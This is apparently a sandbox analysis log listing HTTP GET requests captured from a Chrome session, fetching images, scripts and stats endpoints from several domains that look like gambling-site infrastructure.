Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/button/icon_coin_n.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/img_bg.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/button/icon_member_n.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mimlib.wasm HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"88346086e882b94f3127e009fea42084"
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/static/js/gb.validation.min.js?v=1716975949157 HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/bbin_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/367/mask_sport.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/menu.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/nav/ico_arrow_down.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/new_service_icon.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/ag_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/og_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745 HTTP/1.1Host: ahd-ocssn.qqxgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/pt_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/inside.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/login.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/footerImg.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/footerService.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/footerNav.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745 HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/parner/logo_bolin.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/parner/logo_italy.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/ll12/202307/202307192352577.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gd_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/pwv/sn.settings.get HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mt-cloud/api/sn.maintain.list HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/pwv/agent.code HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/lebo_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /errors/605.html HTTP/1.1Host: x551005.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: route=29c626d4e884fe4301eb6b56b4d56981
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/382/headerTip.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gc_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/ll12/202312/202312222129050.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 43370d.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/382/logo.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/parner/argentina_logo.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/382/login.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/footerCopyRight.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/382/menu.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/wrapper.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/slides.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/news.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/inside.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/bwin1768/plugin/js/myAnimate.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/views/home/indexContainer.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/noticeBox.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
